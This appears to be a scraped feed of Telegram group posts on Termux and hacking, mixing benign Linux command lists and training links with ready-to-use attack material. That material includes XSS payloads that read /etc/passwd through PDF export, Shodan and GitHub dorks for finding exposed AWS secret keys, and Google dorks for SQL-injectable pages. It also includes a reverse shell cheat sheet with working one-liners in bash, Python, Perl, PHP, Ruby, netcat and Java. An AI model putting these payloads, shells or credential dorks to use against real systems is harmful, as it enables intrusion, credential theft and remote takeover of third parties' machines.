Termux All Command [Telegram Group]

600 Bug Bounty Writeups : https://github.com/devanshbatham/Awesome-Bugbounty-Writeups?tab=readme-ov-file

Top 50 Linux Commands You Must Know as a Regular User... 1. ls - view contents of directory (list) 2. pwd - path of the current directory 3. cd - change directoryn 4. mkdir - make new directory 5. mv - move files / rename files 6. cp - copy files 7. rm - remove files 8. touch - create blank new file 9. rmdir - delete directory 10. cat - list content of file to terminal 11. clear - clear terminal window 12. echo - move data into a file 13. less - Read text file one screen at a time 14. man - show manual of Linux commands 15. sudo - enables you to perform tasks that require administrative or root permissions 16. top - task manager in terminal 17. tar - used to archive multiple files into a tarball 18. grep - used to searching words in specific files 19. head - view first lines of any text file 20. tail - view last lines of any text file 21. diff - compares the contents of two files line by line 22. kill - used for killing unresponsive program 23. jobs - display all current jobs along with their statuses 24. sort - is a command line utility for sorting lines of text files 25. df - info about system disk 26. du - check how much space a file or directory takes 27. zip - to compress your files into a zip archive 28. unzip - to extract the zipped files from a zip archive 29. ssh - a secure encrypted connection between two hosts over and insecure network 30. cal - shows calendar 31. apt - command line tool for interaction with packaging system 32. alias - custom shortcuts used to represent a command 33. w - current user info 34. whereis - used to locate the binary, source, manual page files 35. whatis - used to get one-line man page description 36. useradd - used to create a new user 37. passwd - used to changing password of current user 38. whoami - print current user 39. uptime - print current time when machine starts 40. free - print free disk space info 41. history - print used commands history 42. uname - print detailed information about your Linux system 43. ping - to check connectivity status to a server 44. chmod - to change permissions of files and directories 45. chown - to change ownership of files and directories 46. find - using find searches for files and directories 47. locate - used to locate a file, just like the search command in Windows 48. ifconfig - print ip address stuff 49. ip a - similar to ifconfig but shortest print 50. finger - gives you a short dump of info about a user

XSS to Exfiltrate Data from PDFs 🚨‼️ <script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(‘GET’,’file:///etc/hosts’);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(‘GET’,’file:///etc/passwd’);x.send();</script>

🔰 𝐅𝐑𝐄𝐄 𝐂𝐘𝐁𝐄𝐑 𝐒𝐄𝐂𝐔𝐑𝐈𝐓𝐘 𝐓𝐑𝐀𝐈𝐍𝐈𝐍𝐆- 𝐁𝐋𝐔𝐄 𝐓𝐄𝐀𝐌 🔰 🔗 HackerSploit Training Course -Part 1- (YouTube): https://lnkd.in/eH3UYgp5 🔗 HackerSploit Training Course -Part 2- (Linode Live): https://lnkd.in/ebEGVdGY 🔗 Network Defense/Digital Forensics (EC-Council): https://lnkd.in/ewiVUkYt 🔗 Introduction to Cyber Security -with Case Study: WhatsApp Attack- (Great Learning): https://lnkd.in/eUdRn8Km 🔗 Digital Forensics (Infosec Train): https://lnkd.in/eR58kTPJ 🔗 Introduction Courses (Security Blue Team): https://lnkd.in/efuAKp4h 🔗 Introduction to Cyber Security/Cloud Security/CISSP (Simplilearn): https://lnkd.in/ey5TPBdr 🔗 Network Security NSE1/NSE2/NSE3 (Fortinet NETWORK SECURITY): https://lnkd.in/ehV9aUm7 🔗 SOC Analyst (Splunk): https://lnkd.in/esq4zFTg 🔗 Proactive Security Operations Center (Picus Security Academy): https://lnkd.in/eYA26eN5 🔗 Certified in Cybersecurity℠ - CC (ISC2): https://lnkd.in/eq2E2ci8 🔗 Cyber Aces (SANS Institute): https://lnkd.in/eNCPrtdd 🔗 Introduction to IT and Cybersecurity (Cybrary): https://lnkd.in/emAES4i7 🔗 Computer Systems Security (Massachusetts Institute of Technology): https://lnkd.in/eUDQeT3v

XSS can be used to perform LFI attacks. If a webapp has a PDF export feature that relies on user-supplied data, then local files can be retrieved from the target using the document.write() method. Simply input the following code in the vulnerable field: <script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(‘GET’,’file:///some/file’);x.send();</script>

18 Awesome GitHub Repos for CyberSecurity for every security practitioner. Sharing here as I found them very helpful, specially DevSecOps. 1. Awesome Appsec — https://lnkd.in/gfWgN4ip 2. Awesome Security — https://lnkd.in/gHWgrrv7 3. Awesome CTF — https://lnkd.in/g5ZdDv5V 4. Awesome Malware Analysis — https://lnkd.in/gFPUrgAx 5. Awesome android-security — https://lnkd.in/gDm-kJQd 6. Awesome Hacking — https://lnkd.in/gDAaqkuu 7. Awesome Honeypots — https://lnkd.in/gmBxrTtk 8. Awesome Incident Response — https://lnkd.in/gjvRV5US 9. Awesome Web Security — https://lnkd.in/gsNcpqPq 10. Awesome Cybersecurity Blue Team — https://lnkd.in/ggBVDWvY 11. Awesome Fuzzing — https://lnkd.in/gQZN2D48 12. Awesome GDPR — https://lnkd.in/guwFD4hw 13. Awesome DevSecOps — https://lnkd.in/gJ5MpRn5 14. Awesome Embedded and IoT Security — https://lnkd.in/gJ6kXrfC 15. Awesome Password Cracking — https://lnkd.in/gPapQjeJ 16. Awesome Security Card Games — https://lnkd.in/gbxPAJCe 17. Awesome Prompt Injection — https://lnkd.in/gxe_zEwS 18. Awesome API Security API discovery, Testing in CI/CD, Test Library with 200+ Tests. — https://lnkd.in/gu7pBUvE -- Hope you liked them ✅

𝗔𝗪𝗦 𝗢𝗦𝗜𝗡𝗧 𝗯𝘆 𝗗𝗼𝗿𝗸𝗶𝗻𝗴 🎩 =Shodan Dorks html:"AWS_ACCESS_KEY_ID" html:"AWS_SECRET_ACCESS_KEY" html:"AWS_SESSION_TOKEN" title:"AWS S3 Explorer" html:"AWS Elastic Beanstalk overview" html:"OpenSearch Dashboards" "X-Amz-Server-Side-Encryption" title:"EC2 Instance Information" http.title:"Amazon Cognito Developer Authentication Sample" "Server: EC2ws" title:"AWS X-Ray Sample Application" html:"Amazon EC2 Status" html:"AWS EC2 Auto Scaling Lab" html:"istBucketResult" =Search Engine Dorks site:.s3.amazonaws.com "Company" site:http://s3.amazonaws.com intitle:index.of.bucket “” site:s3.amazonaws.com "index of /" s3 site:amazonaws.com filetype:xls password inurl:gitlab "AWS_SECRET_KEY" inurl:pastebin "AWS_ACCESS_KEY" inurl:s3.amazonaws.com intitle:"AWS S3 Explorer" =Github Dorks Key:amazon_secret_access_key amazonaws aws_access aws_access_key_id aws_bucket aws_key aws_secret aws_secret_key aws_token bucket_password bucketeer_aws_access_key_id bucketeer_aws_secret_access_key cache_s3_secret_key cloud_watch_aws_access_key filename:credentials aws_access_key_id filename:s3cfg lottie_s3_api_key lottie_s3_secret_key rds.amazonaws.com password s3_access_key s3_access_key_id s3_key s3_key_app_logs s3_key_assets s3_secret_key sandbox_aws_access_key_id sandbox_aws_secret_access_key secret_key eureka.aws secretkey filename:.bash_profile aws filename:.s3cfg #aws #cloudsecurity #osint #dorking #cloud_dorking

termux latest version is: 0.118.0 and download link is : https://f-droid.org/repo/com.termux_118.apk

ramadan mubarak for everyone GUYS

Autocad Web Version : https://web.autocad.com/acad/me

FREE LABS TO TEST YOUR PENTEST/CTF SKILLS Share with your network and friends. · Academy Hackaflag BR - https://hackaflag.com.br/ · Attack-Defense - https://attackdefense.com · Alert to win - https://alf.nu/alert1 · CTF Komodo Security - https://ctf.komodosec.com · CMD Challenge - https://cmdchallenge.com · Explotation Education - https://exploit.education · Google CTF - https://lnkd.in/dr5PpY9w · HackTheBox - https://www.hackthebox.com · Hackthis - https://www.hackthis.co.uk · Hacksplaining - https://lnkd.in/d7bWaemY · Hacker101 - https://ctf.hacker101.com · Hacker Security - https://lnkd.in/dvwVDxhW · Hacking-Lab - https://hacking-lab.com/ · HSTRIKE - https://hstrike.com · ImmersiveLabs - https://immersivelabs.com · NewbieContest - https://lnkd.in/d2cwc84z · OverTheWire - http://overthewire.org · Practical Pentest Labs - https://lnkd.in/esq9Yuv5 · Pentestlab - https://pentesterlab.com · Penetration Testing Practice Labs -https://lnkd.in/deVqpXPD · PentestIT LAB - https://lab.pentestit.ru · PicoCTF - https://picoctf.com · PWNABLE - https://lnkd.in/d5qsiyqv · Root-Me - https://www.root-me.org · Root in Jail - http://rootinjail.com · SANS Challenger - https://lnkd.in/dN4TYpTb · SmashTheStack - https://lnkd.in/dvRgjfYQ · The Cryptopals Crypto Challenges - https://cryptopals.com · Try Hack Me - https://tryhackme.com · Vulnhub - https://www.vulnhub.com · W3Challs - https://w3challs.com · WeChall - http://www.wechall.net · Zenk-Security - https://lnkd.in/daNbvUBk

git clone https://github.com/az7rb/crt.sh.git && cd crt.sh/ && chmod +x crt.sh && ./crt.sh -h ./crt.sh -d hackerone.com | httpx

Some Shodan Dorks that might useful in Bug Bounty. 1. org:"http://target. com" 2. http.status:"<status_code>" 3. product:"<Product_Name>" 4. port:<Port_Number> “Service_Message” 5. port:<Port_Number> “Service_Name” 6. http.component:"<Component_Name>" 7. http.component_category:"<Component_Category> 8. http.waf:"<firewall_name>" 9. http.html:"<Name>" 10. http.title:"<Title_Name>" 11. ssl.alpn:"<Protocol>" 12. http.favicon.hash:"<Favicon_Hash>" 13. net:"<Net_Range>" (for e.g. 104.16.100.52/32) 14. http://ssl.cert.subject.cn:"<http://Domain .com>" 15. asn:"<ASnumber>" 16. hostname:"<hosthame>" 17. ip:"<IP_Address>" 18. all:"<Keyword>" 19. “Set-Cookie: phpMyAdmin” 20. “Set-Cookie: lang=" 21. “Set-Cookie: PHPSESSID" 22. “Set-Cookie: webvpn” 23. “Set-Cookie:webvpnlogin=1" 24. “Set-Cookie:webvpnLang=en” 25. “Set-Cookie: mongo-express=" 26. “Set-Cookie: user_id=" 27. “Set-Cookie: phpMyAdmin=" 28. “Set-Cookie: _gitlab_session” 29. “X-elastic-product: Elasticsearch” 30. “x-drupal-cache” 31. “access-control-allow-origin” 32. “WWW-Authenticate” 33. “X-Magento-Cache-Debug” 34. “kbn-name: kibana”

Reverse Shell Cheat Sheet Bash; bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 Python; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' PERL; perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' PHP; php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' Ruby; ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' Netcat; nc -e /bin/sh 10.0.0.1 1234 Java; r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() xterm; xterm -display 10.0.0.1:1

50+ SQLI GoogleDorks inurl:index.php?id= inurl:news.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:product.php?id= inurl:category.php?id= inurl:page.php?id= inurl:detail.php?id= inurl:show.php?id= inurl:content.php?id= inurl:shop.php?id= inurl:view.php?id= inurl:info.php?id= inurl:profile.php?id= inurl:item.php?id= inurl:event.php?id= inurl:download.php?id= inurl:board.php?id= inurl:login.php?id= inurl:checkout.php?id= inurl:search.php?id= inurl:buy.php?id= inurl:product_list.php?id= inurl:catalog.php?id= inurl:store.php?id= inurl:cart.php?id= inurl:product_detail.php?id= inurl:faq.php?id= inurl:feedback.php?id= inurl:vote.php?id= inurl:member.php?id= inurl:forum.php?id= inurl:profile_view.php?id= inurl:event_info.php?id= inurl:show_item.php?id= inurl:download_file.php?id= inurl:show_post.php?id= inurl:info_view.php?id= inurl:article_read.php?id= inurl:content_view.php?id= inurl:review.php?id= inurl:item_view.php?id= inurl:gallery_view.php?id= inurl:news_item.php?id= inurl:shop_view.php?id=

 Check If Your Email Have Been Leaked • leakcheck.io • dehashed.com • ghostproject.fr • leakedsource.ru • breachalarm.com • sitecheck.sucuri.net • monitor.firefox.com